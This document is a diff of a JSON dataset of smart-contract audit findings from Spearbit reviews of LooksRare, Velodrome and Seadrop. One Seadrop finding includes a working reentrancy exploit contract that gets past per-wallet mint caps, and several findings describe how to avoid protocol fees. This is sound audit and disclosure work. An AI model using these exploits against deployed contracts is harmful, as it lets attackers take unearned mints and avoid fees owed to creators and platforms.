Trans- ferManager has marked the LooksRareProtocol as an allowed operator. At any point, OT can call removeOpera- tor to block L from calling T . If that happens, OL would need to add new (virtual) asset types (not 0 or 1) and the corresponding transfer managers for them. Makers would need to resign their orders with new asset types. Moreover, if LooksRare for the following issue \"The Protocol owner can drain users' currency tokens\" applies their solution through PR 308 which removes the ability of OL to add new asset types, then the whole protocol would need to be redeployed, since all order executions would revert.", + "title": "Some setters cannot be changed by governance", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "It was found that some setters, related to emergencyCouncil and Team can only be called by the current role owner. It may be best to allow Governance to also be able to call such setters as a way to allow it to override or replace a misaligned team. The Emergency Council can kill gauges, preventing those gauges from receiving emissions. Voter.sol#L151-L155. function setEmergencyCouncil(address _council) public { if (_msgSender() != emergencyCouncil) revert NotEmergencyCouncil(); if (_council == address(0)) revert ZeroAddress(); emergencyCouncil = _council; } The team can simply change the ArtProxy which is a cosmetic aspect of Voting Escrow. VotingEscrow.sol#L241-L245 function setTeam(address _team) external { if (_msgSender() != team) revert NotTeam(); if (_team == address(0)) revert ZeroAddress(); team = _team; }", "labels": [ "Spearbit", - "LooksRare", + "Velodrome", "Severity: Low Risk" ] }, { - "title": "transferItemsERC721 and transferBatchItemsAcrossCollections in TransferManager do not check whether an amount == 1 for an ERC721 token", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "transferItemsERC721 and transferBatchItemsAcrossCollections in TransferManager do not check whether an amount == 1 for an ERC721 token. If an operator (approved by a user) sends a 0 amount for an itemId in the context of transferring ERC721 token, TransferManager would perform those transfers, even though the logic in the operator might have meant to avoid those transfers.", + "title": "Rebase Rewards distribution is shifted by one week, allowing new depositors to receive unfair yield initially (which they'll give back after they withdraw)", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "The finding is not particularly dangerous but it is notable that because Reward will allow claiming of rewards on the following Epoch, and because Rebase rewards from the Distributor Distributor.claim are distributed based on the balance at the last second of the previous epoch, a desynchronization in how rewards are distributed will happen. This will end up being fair in the long run however here's an illustrative scenario: Locker A has a small lock, they wish to increase the amount they have locked. They increase the amount but miss out on rebase rewards (because they are based on their balance at the last second of the previous epoch). They decide to depositManaged which will distribute rewards based on their current balance, meaning they will \"steal\" a marginal part of the yield. 72 The next epoch, their weight will help increase the yield for everyone, and because Rebasing Rewards are distributed with a week of delay, they will eventually miss out on a similar proportion of yield they \"stole\".", "labels": [ "Spearbit", - "LooksRare", + "Velodrome", "Severity: Low Risk" ] }, { - "title": "The maker cannot enforce the number of times a specific order can be fulfilled for custom strategies", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "When a maker signs an order with a specific strategy it leaves it up to the strategy to decide how many times this specific order can be fulfilled. The strategy's logic on how to decide on the returned isNonceIn- validated value, can be a complex logic in general that might be prone to errors (or have backdoors). The maker should be able to directly enforce at least an upper bound for the maximum number of fulfills for an order to avoid unexpected expenditure.", + "title": "AutoCompounder can be created without admin", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Creating an AutoCompounder contract without an _admin by passing address(0) through AutoCom- pounderFactory is possible. This will break certain functionalities in the AutoCompounder.", "labels": [ "Spearbit", - "LooksRare", + "Velodrome", "Severity: Low Risk" ] }, { - "title": "A strategy can potentially reduce the value of a token before it gets transferred to a maker when a taker calls executeTakerAsk", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "When executeTakerAsk is called by a taker a (signed by maker) strategy will be called: (bool status, bytes memory data) = strategyInfo[makerBid.strategyId].implementation.call( abi.encodeWithSelector(strategyInfo[makerBid.strategyId].selector, takerAsk, makerBid) ); Note that this is a stateful call. This call is performed before the NFT token is transferred to the maker (signer). Even though the strategy is fixed by the maker (since the stratgeyId has been signed), the strategy's implementation might involve a complex logic that might allow (if the strategy colludes with the taker somehow) a derivative token (that is owned by / linked to the to-be-transferred token) to be reattached to another token (think of accessories for an NFT character token in a game). And so the value of the to-be-transferred token would be reduced in that sense. A maker would not be able to check for this linked derivative token ownership during the transaction since there is no post-transfer hook for the maker (except in one special case when the token involved is ERC1155 and the maker is a custom contract). Also, note that all the implemented strategies would not alter the state when they are called (their endpoints have a pure or a view visibility). There is an exception to this in the StrategyTestMultiFillCollectionOrder test contract.", + "title": "claim and claimMany functions will revert when called in end lock time", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "block.timestamp >= oldLocked.end. If _timestamp == _locked.end, then depositFor() will be called but this will revert as", "labels": [ "Spearbit", - "LooksRare", + "Velodrome", "Severity: Low Risk" ] }, { - "title": "An added transfer manager cannot get deactivated from the protocol", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "Once a transfer manager for an asset type gets added to the protocol either through the constructor or through addTransferManagerForAssetType, if at some point there is a malicious behavior involved with the transfer manager, there is no mechanism for the protocol's owner to deactivate the transfer manager (similar to how strategies can be deactivated). If TransferManager is used for an asset type, on the TransferManager side the owner can break the link between the operator (the LooksRare protocol potentially) and the TransferManager but not the other way around.", + "title": "Malicious Pool Factory can be used to prevent new pools from being voted on as well as brick voting locks", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Because gauges[_pool] can only be set once in the voter, governance has the ability to introduce a malicious factory, that will revert on command as a way to prevent normal protocol functionality as well as prevent depositors that voted on these from ever being able to unlock their NFTs ve.withdraw requires not having voted. To remove voting reset is called, which in turn calls IReward(gaugeToFees[gauges[_pool]])._with- draw(uint256(_votes), _tokenId);. If a malicious gaugeToFees contract is deployed, the tokenId won't be able to ever set voted to false preventing the ability from ever withdrawing. 73", "labels": [ "Spearbit", - "LooksRare", + "Velodrome", "Severity: Low Risk" ] }, { - "title": "Temporary DoS is possible in case orders are using tokens with blacklists", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "In the process of settling orders, _transferFungibleTokens is being called at max 4 times. In case one of these calls fails the entire transaction fails. It can only fail when an ERC20 token is used for the trade but since contracts are whitelisted in the system and probably vetted by the team, it's safe to say it's less probable that the receiver will have the ability to revert the entire transaction, although it is possible for contracts that implement a transferAndCall pattern. However, there's still the issue of transactions being reverted due to blacklistings (which have become more popular in the last year). In order to better assess the risk let's elaborate more on the 4 potential recipients of a transaction: 1. affiliate - The risk can be easily mitigated by proper handling at the front-end level. If the transaction fails due to the affiliate's address, the taker can specify address(0) as the affiliate. 2. recipient - If the transaction fails due to the recipient's address, it can only impact the taker in a gas-griefing way. 3. protocol - If the transaction fails due to the protocol's address, its address might be updated by the contract owner in the worst case. 4. creator - If the transaction fails due to the creator's address it can not be changed directly, but in the worst case creatorFeeManager can be changed.", + "title": "Pool will stop working if a pausable / blockable token is blocked", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Some tokens are pausable or implement a block list (e.g. USDC), if such a token is part of a Pool, and the Pool is blocked, the Pool will stop working. It's important to notice that the LP token, which wraps a deposit will still be transferable and the composability with Gauges and Reward Contracts will not be broken even when the pool is unable to function.", "labels": [ "Spearbit", - "LooksRare", + "Velodrome", "Severity: Low Risk" ] }, { - "title": "viewCreatorFeeInfo's reversion depends on order of successful calls to collection.royaltyInfo", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "The outcome of the call to viewCreatorFeeInfo for both CreatorFeeManagerWithRebates and Cre- atorFeeManagerWithRoyalties is dependent on the order of itemIds. Assume, we have 2 itemIds with the following properties: itemId x where the call to collection.royaltyInfo(x, price) is successful (status == 1) and returns (a, ...) where a 6= 0. itemId y where the call to collection.royaltyInfo(y, price) fails (status == 0) Then if itemIds provided to viewCreatorFeeInfo is: [x, y], the call to viewCreatorFeeInfo returns successfully as the outcome for y will be ignored/skipped. [y, x], the call to viewCreatorFeeInfo reverts with BundleEIP2981NotAllowed(collection), since the first item will be skipped and so the initial value for creator will not be set and remains address(0), but when we process the loop for x, we end up comparing a with address(0) which causes the revert.", + "title": "Use ClonesWithImmutableArgs in AutoCompounderFactory saves gas", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "The AutoCompounderFactory can utilize ClonesWithImmutableArgs to deploy new AutoCompounder contracts. This would save a lot of gas compared to the current implementation.", "labels": [ "Spearbit", - "LooksRare", - "Severity: Low Risk" + "Velodrome", + "Severity: Gas Optimization" ] }, { - "title": "CreatorFeeManagerWithRebates.viewCreatorFeeInfo reversion is dependent on the order of itemIds", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "Assume there is an itemId x where collection.royaltyInfo(x, price) returns (0, _) and an- other itemId y where collection.royaltyInfo(y, price) returns (a, _) where a 6= 0. the itemIds array provided to CreatorFeeManagerWithRebates.viewCreatorFeeInfo is [x, y, the call would revert with the return parameters would be (address(0), 0) and [y, x, ...], Then if ...], BundleEIP2981NotAllowed(collection).", + "title": "Convert hardcoded route to internal function in CompoundOptimizer", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "All of the hardcoded route setups can be converted to an internal function with hardcoded values.", "labels": [ "Spearbit", - "LooksRare", - "Severity: Low Risk" + "Velodrome", + "Severity: Gas Optimization" ] }, { - "title": "Seller might get a lower fee than expected due to front-running", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "This protocol seems to have a fee structure where both the protocol and the original creator of the item are charging fees, and these fees are being subtracted from the seller's fee. This means that the seller, whether they are a maker or a taker, may receive a lower price than they expected due to sudden changes in creator or protocol fee rates.", + "title": "Early return in supplyAt save gas", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "To save gas, you can return in case of _epoch is equal to zero can be made before cache _point.", "labels": [ "Spearbit", - "LooksRare", - "Severity: Low Risk" + "Velodrome", + "Severity: Gas Optimization" ] }, { - "title": "StrategyManager does not emit an event when the first strategy gets added.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "StrategyManager does not emit an event when the first strategy gets added which can cause issues for off-chain agents.", + "title": "Approved User could Split NFTs and be unable to continue operating", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "An approved user can be approved via approve, the storage value set is idToApprovals[_tokenId] = _approved; Splitting will create two new NFTs that will be sent to the owner. This means that an approved user would be able to split the NFTs on behalf of the owner, however, in doing so they would lose ownership of the NFTs, being unable to continue using them during the TX", "labels": [ "Spearbit", - "LooksRare", - "Severity: Low Risk" + "Velodrome", + "Severity: Informational" ] }, { - "title": "TransferSelectorNFT does not emit events when new transfer managers are added in its construc- tor", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "TransferSelectorNFT does not emit an event when assetTypes of 0 and 1 are added in its con- structor.", + "title": "Add sweep function to CompoundOptimizer", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Some tokens may be completely illiquid, may not be worth auto-compounding so it would be best to also allow a way to sweep tokens out to the owner for some tokens. Examples: Airdrops / Extra rewards. Very new tokens that the owner wants to farm instead of dump.", "labels": [ "Spearbit", - "LooksRare", - "Severity: Low Risk" + "Velodrome", + "Severity: Informational" ] }, { - "title": "Protocol fees will be sent to address(0) if protocolFeeRecipient is not set.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "Protocol fees will be sent to address(0) if protocolFeeRecipient is not set.", + "title": "Allow Manual Suggestion of Pair in AutoCompounder", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Allow manual suggestion of token pairs such as USDC, USDT, LUSD, and wBTC. It may be best to pass a list of pairs as parameters to check for additional tokens. Ultimately, if a suggested pair offers a better price, there's no reason not to allow it. The caller should be able to pass a suggested optimal route, which can then be compared against other routes. Use whichever route is best. If the user's suggested route is the best one, use theirs and ensure that the swap goes through.", "labels": [ "Spearbit", - "LooksRare", - "Severity: Low Risk" + "Velodrome", + "Severity: Informational" ] }, { - "title": "The returned price by strategies are not validated", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "When a taker submits an order to be executed, the returned price by the maker's chosen strategy is not validated. The current strategies do have the validations implemented. But the general upper and lower bound price validation would need to be in the protocol contract itself since the price calculation in a potential strategy might be a complex matter that cannot be easily verified by a maker or a taker. Related issue: \"price validation in executeStrategyWithTakerAsk, executeCollectionStrategyWithTakerAsk and ex- ecuteCollectionStrategyWithTakerAskWithProof can be relaxed\"", + "title": "Check if owner exists in split function", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "In case the NFT does not exist, the _ownerOf(_from) function returns the zero address. This check is satisfied if canSplit has been toggled. However, this does not lead to any issues because the _- isApprovedOrOwner() check will revert as intended, and there is no amount in the lock. It may be a good idea to update the _ownerOf() function to revert if there is no owner for the NFT.", "labels": [ "Spearbit", - "LooksRare", - "Severity: Low Risk" + "Velodrome", + "Severity: Informational" ] }, { - "title": "Makers can sign (or be tricked into signing) collection of orders (using the merkle tree mechanism) that cannot be entirely canceled.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "All user-facing order execution endpoints of the protocol check whether the order hash is included in the merkle tree data provided by the caller. If it is, the maker/signer is only required to sign the hash of the tree's root. A maker might sign (or get tricked into signing) a root that belongs to trees with a high number of leaves such that the leaves each encode an order with Different subsetNonce and orderNonce (this would require canceling each nonce individually if the relevant endpoints are used). askNonce or bidNonce that form a consecutive array of intergers ( 1, (cid:1) (cid:1) (cid:1) , n ) (this would require incrementing these nonces at least n times, if this method was used as a way of canceling the orders). To cancel these orders, the maker would need to call the cancelOrderNonces, cancelSubsetNonces, or incre- mentBidAskNonces. If the tree has a high number of nodes, it might be infeasible to cancel all the orders due to gas costs. The maker would be forced to remove its token approvals (if it's not a custom EIP-1271 maker/signer) and not use that address again to interact with the protocol.", + "title": "Velo and Veto Governor do not use MetaTX Context", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "These two contracts use Context instead of ERC2771Context.", "labels": [ "Spearbit", - "LooksRare", - "Severity: Low Risk" + "Velodrome", + "Severity: Informational" ] }, { - "title": "The ItemIdsRange strategy allows for length mismatch in itemIds and amounts", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "There is no validation that takerAsk.itemIds.length == takerAsk.amounts.length in the ItemIdsRange strategy, despite takerAsk.itemIds and takerAsk.amounts being the return values of the executeStrategyWithTakerAsk function. If takerAsk.itemIds.length > takerAsk.amounts.length, then the transaction will revert anyways when it attempts to read an index out of bounds in the main loop. However, there is nothing causing a revert if takerAsk.itemIds.length < takerAsk.amounts.length, and any extra values in the takerAsk.amounts array will be ignored. Most likely this issue would be caught later on in any transaction, e.g. the current TransferManager implementation checks for length mismatches. However, this TransferManager is just one possible implementation that could be added to the TransferSelectorNFT contract, so this still could be an issue.", + "title": "SinkManager is depositing to Gauge without using the TokenId", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "gauge.deposit allows to specify a tokenId, but the field is unused", "labels": [ "Spearbit", - "LooksRare", - "Severity: Low Risk" + "Velodrome", + "Severity: Informational" ] }, { - "title": "Spec mismatch - StrategyCollectionOffer allows the only single item orders where the spec states it should allow any amount", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "Proof only allow the transfer of a single ERC721/ERC1155 item, although the specification states it should support any amount.", + "title": "ERC721SeaDrop's modifier onlyOwnerOrAdministrator would allow either the owner or the admin to override the other person's config parameters.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "The following 4 external functions in ERC721SeaDrop have the onlyOwnerOrAdministrator modifier which allows either one to override the other person's work. updateAllowedSeaDrop updateAllowList updateDropURI updateSigner That means there should be some sort of off-chain trust established between these 2 entities. Otherwise, there are possible vectors of attack. Here is an example of how the owner can override AllowListData.merkleRoot and the other fields within AllowListData to generate proofs for any allowed SeaDrop's mintAllowList endpoint that would have MintParams.feeBps equal to 0: 1. The admin calls updateAllowList to set the Merkle root for this contract and emit ERC721SeaDrop.updateAllowList: SeaDrop.sol#L827 the other parameters as logs. for an allowed SeaDrop implementation The SeaDrop endpoint being called by 2. The owner calls updateAllowList but this time with new parameters, specifically a new Merkle root that is computed from leaves that have MintParams.feeBps == 0. 3. Users/minters use the generated proof corresponding to the latest allow list update and pass their mintParams.feeBps as 0. And thus avoiding the protocol fee deduction for the creatorPaymentAddress (SeaDrop.sol#L187-L194).", "labels": [ "Spearbit", - "LooksRare", - "Severity: Low Risk" + "Seadrop", + "Severity: High Risk" ] }, { - "title": "Owner of strategies that inherit from BaseStrategyChainlinkMultiplePriceFeeds can add mali- cious price feeds after they have been added to LooksRareProtocol", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "Owner of strategies that inherit from BaseStrategyChainlinkMultiplePriceFeeds can add mali- cious price feeds for new collections after they have been added to LooksRareProtocol. It's also important to note that these strategy owners might not neccessarily be the same owner as the LooksRareProtocol's. 1. LooksRareProtocol's OL adds strategy S. 2. Stragey's owner OS adds a malicous price feed for a new collection T .", + "title": "Reentrancy of fee payment can be used to circumvent max mints per wallet check", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "In case of a mintPublic call, the function _checkMintQuantity checks whether the minter has exceeded the parameter maxMintsPerWallet, among other things. However, re-entrancy in the above fee dispersal mechanism can be used to circumvent the check. The following is an example contract that can be employed by the feeRecipent (assume that maxMintsPerWallet is 1): 7 contract MaliciousRecipient { bool public startAttack; address public token; SeaDrop public seaDrop; fallback() external payable { if (startAttack) { startAttack = false; seaDrop.mintPublic{value: 1 ether}({ nftContract: token, feeRecipient: address(this), minterIfNotPayer: address(this), quantity: 1 }); } } // Call `attack` with at least 2 ether. function attack(SeaDrop _seaDrop, address _token) external payable { token = _token; seaDrop = _seaDrop; startAttack = true; _seaDrop.mintPublic{value: 1 ether}({ nftContract: _token, feeRecipient: address(this), minterIfNotPayer: address(this), quantity: 1 }); token = address(0); seaDrop = SeaDrop(address(0)); } } This is especially bad when the parameter PublicDrop.restrictFeeRecipients is set to false, in which case, anyone can circumvent the max mints check, making it a high severity issue. In the other case, only privileged users, i.e., should be part of _allowedFeeRecipients[nftContract] mapping, would be able to circumvent the check--lower severity due to needed privileged access. Also, creatorPaymentAddress can use re-entrancy to get around the same check. See SeaDrop.sol#L571.", "labels": [ "Spearbit", - "LooksRare", - "Severity: Low Risk" + "Seadrop", + "Severity: High Risk" ] }, { - "title": "The price calculation in StrategyDutchAuction can be more accurate", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "StrategyDutchAuction calculates the auction price as uint256 duration = makerAsk.endTime - makerAsk.startTime; uint256 decayPerSecond = (startPrice - makerAsk.minPrice) / duration; uint256 elapsedTime = block.timestamp - makerAsk.startTime; price = startPrice - elapsedTime * decayPerSecond; One of the shortcomings of the above calculation is that division comes before multiplication which can amplify the error due to division.", + "title": "Cross SeaDrop reentrancy", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "The contract that implements IERC721SeaDrop can work with multiple Seadrop implementations, for example, a Seadrop that accepts ETH as payment as well as another Seadrop contract that accepts USDC as payment at the same time. This introduces the risk of cross contract re-entrancy that can be used to circumvent the maxMintsPerWallet check. Here's an example of the attack: 1. Consider an ERC721 token that that has two allowed SeaDrop, one that accepts ETH as payment and the other that accepts USDC as payment, both with public mints and restrictedFeeRecipients set to false. 2. Let maxMintPerWallet be 1 for both these cases. 3. A malicious fee receiver can now do the following: Call mintPublic for the Seadrop with ETH fees, which does the _checkMintQuantity check and trans- fers the fees in ETH to the receiver. The receiver now calls mintPublic for Seadrop with USDC fees, which does the _checkMintQuantity check that still passes. The mint succeeds in the Seadrop-USDC case. The mint succeeds in the Seadrop-ETH case. The minter has 2 NFTs even though it's capped at 1. Even if a re-entrancy lock is added in the SeaDrop, the same issue persists as it only enters each Seadrop contract once.", "labels": [ "Spearbit", - "LooksRare", - "Severity: Low Risk" + "Seadrop", + "Severity: Medium Risk" ] }, { - "title": "Incorrect isMakerBidValid logic in ItemIdsRange execution strategy", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "If an ItemIdsRange order has makerBid.itemIds[0] == 0, it is treated as invalid by the corre- sponding isMakerBidValid function. Since makerBid.itemIds[0] is the minItemId value, and since many NFT collections contain NFTs with id 0, this is incorrect (and does not match the logic of the ItemIdsRange executeS- trategyWithTakerAsk function). As a consequence, frontends that filter orders based on the isMakerBidValid function will ignore certain orders, even though they are valid.", + "title": "Lack of replay protection for mintAllowList and mintSigned", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "merkle proofs) there are no checks that prevent re-using the same signature or Merkle proof multiple This is indirectly enforced by the _checkMintQuantity function that checks the mint statistics times. using exceeds maxMintsPerWallet. Replays can happen if a wallet does not claim all of maxMintsPerWallet in one transaction. For example, assume that maxMintsPerWallet is set to 2. A user can call mintSigned with a valid signature and quantity = 1 twice. IERC721SeaDrop(nftContract).getMintStats(minter) reverting quantity and the if Typically, contracts try to avoid any forms of signature replays, i.e., a signature can only be used once. This simpli- fies the security properties. In the current implementation of the ERC721Seadrop contract, we couldn't see a way to exploit replay protection to mint beyond what could be minted in a single initial transaction with the maximum value of quantity supplied. However, this relies on the contract correctly implementing IERC721SeaDrop.getMintStats.", "labels": [ "Spearbit", - "LooksRare", - "Severity: Low Risk" + "Seadrop", + "Severity: Medium Risk" ] }, { - "title": "Restructure struct definitions in OrderStructs in a more optimized format", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "Maker and taker ask and bid structs include the fields itemIds and amounts. For most strategies, these two arrays are supposed to have the same length (except for StrategyItemIdsRange). Even for Strate- gyItemIdsRange one can either: Relax the requirement that makerBid.amounts.length == 1 (be replaced by amounts and itemIds length to be equal to 2 ) by allowing an unused extra amount or not use the makerBid.amounts and makerBid.itemIds and instead grab those 3 parameters from the addi- tionalParameters field. This might actually make more sense since in the case of StrategyItemIdsRange, the itemIds and amounts carry information that deviates from what they are intended to be used for.", + "title": "The digest in SeaDrop.mintSigned is not calculated correctly according to EIP-712", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "mintParams in the calculation of the digest in mintSigned is of struct type, so we would need to calculate and use its hashStruct , not the actual variable on its own.", "labels": [ "Spearbit", - "LooksRare", - "Severity: Gas Optimization" + "Seadrop", + "Severity: Medium Risk" ] }, { - "title": "if/else block in executeMultipleTakerBids can be simplified/optimized", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "if/else block in executeMultipleTakerBids can be simplified/optimized by using the continue keyword and placing the else's body in the outer scope. // If atomic, it uses the executeTakerBid function, if not atomic, it uses a catch/revert pattern with external function ,! if (isAtomic) { // Execute the transaction and add protocol fee totalProtocolFeeAmount += _executeTakerBid(takerBid, makerAsk, msg.sender, orderHash); unchecked { ++i; } continue; } try this.restrictedExecuteTakerBid(takerBid, makerAsk, msg.sender, orderHash) returns ( uint256 protocolFeeAmount ) { totalProtocolFeeAmount += protocolFeeAmount; } catch {} unchecked { ++i; } testThreeTakerBidsERC721OneFails() (gas: -24 (-0.002%)) Overall gas change: -24 (-0.002%) LooksRare: Fixed in PR 323. Spearbit: Verified.", + "title": "ERC721A has mint caps that are not checked by ERC721SeaDrop", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "ERC721SeaDrop inherits from ERC721A which packs balance, numberMinted, numberBurned, and an extra data chunk in 1 storage slot (64 bits per substorage) for every address. This would add an inherent cap of 264 (cid:0) 1 to all these different fields. Currently, there is no check in ERC721A's _mint for quantity nor in ERC721SeaDrop's mintSeaDrop function. Also, if we almost reach the max cap for a balance by an owner and someone else transfers a token to this owner, there would be an overflow for the balance and possibly the number of mints in the _packedAddressData. The overflow could possibly reduce the balance and the numberMinted to a way lower numer and numberBurned to a way higher number", "labels": [ "Spearbit", - "LooksRare", - "Severity: Gas Optimization" + "Seadrop", + "Severity: Medium Risk" ] }, { - "title": "Cache currency in executeTakerAsk and executeTakerBid", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "currency is read multiple times from calldata in executeTakerAsk and executeTakerBid.", + "title": "ERC721SeaDrop owner can choose an address they control as the admin when the constructor is called.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "The owner/creator can call the contract directly (skip using the UI) and set the administrator as themselves or another address that they can control. Then after they create a PublicDrop or TokenGatedDrop, they can call either updatePublicDropFee or updateTokenGatedDropFee and set the feeBps to zero or another number and also call the updateAllowedFeeRecipient to add the same or another address they control as a feeRecipient. This way they can circumvent the protocol fee.", "labels": [ "Spearbit", - "LooksRare", - "Severity: Gas Optimization" + "Seadrop", + "Severity: Medium Risk" ] }, { - "title": "Cache operators[i] in grantApprovals and revokeApprovals", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "operators[i] is used 3 times in grantApprovals's (and twice in revokeApprovals) for loop.", + "title": "ERC721SeaDrop's admin would need to set feeBps manually after/before creation of each drop by the owner", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "When an owner of a ERC721SeaDrop token creates either a public or a token gated drop by calling updatePublicDrop or updateTokenGatedDrop, the PublicDrop.feeBps/TokenGatedDropStage.feeBps is initially set to 0. So the admin would need to set the feeBps parameter at some point (before or after). Forgetting to set this parameter results in not receiving the protocol fees.", "labels": [ "Spearbit", - "LooksRare", - "Severity: Gas Optimization" + "Seadrop", + "Severity: Medium Risk" ] }, { - "title": "recipients[0] is never used", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "recipients[0] is set to protocolFeeRecipient. But its value is never used afterward. payProtocolFeeAndAffiliateFee, the fees[0] amount is manually distributed to an affiliate if any and the pro- tocolFeeRecipient.", + "title": "owner can reset feeBps set by admin for token gated drops", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "Only the admin can call updateTokenGatedDropFee to update feeBps. However, the owner can call updateTokenGatedDrop(address seaDropImpl, address allowedNftToken, TokenGatedDropStage calldata drop- Stage) twice after that to reset the feeBps to 0 for a drop. 1. Once with dropStage.maxTotalMintableByWallet equal to 0 to wipe out the storage on the SeaDrop side. 2. Then with the same allowedNftToken address and the other desired parameters, which would retrieve the previously wiped out drop stage data (with feeBps equal to 0). NOTE: This type of attack does not apply to updatePublicDrop and updatePublicDropFee pair. Since updatePub- licDrop cannot remove or update the feeBps. Once updatePublicDropFee is called with a specific feeBps that value remains for this ERC721SeaDrop contract-related storage on SeaDrop (_publicDrops[msg.sender] = pub- licDrop). And any number of consecutive calls to updatePublicDrop with any parameters cannot change the already set feeBps.", "labels": [ "Spearbit", - "LooksRare", - "Severity: Gas Optimization" + "Seadrop", + "Severity: Medium Risk" ] }, { - "title": "currency validation can be optimized/refactored", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "In the context above we are enforcing only native tokens or WETH to be supplied. The if statement can be simplified and refactored into a utility function (possibly defined in either BaseStrategy or in BaseStrate- gyChainlinkPriceLatency): if (makerAsk.currency != address(0)) { if (makerAsk.currency != WETH) { revert WrongCurrency(); } }", + "title": "Update the start token id for ERC721SeaDrop to 1", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "ERC721SeaDrop's mintSeaDrop uses _mint from ERC721A library which starts the token ids for minting from 0. /// contracts/ERC721A.sol#L154-L156 /** * @dev Returns the starting token ID. * To change the starting token ID, please override this function. */ function _startTokenId() internal view virtual returns (uint256) { return 0; }", "labels": [ "Spearbit", - "LooksRare", - "Severity: Gas Optimization" + "Seadrop", + "Severity: Low Risk" ] }, { - "title": "validating amount can be simplified and possibly refactored", - 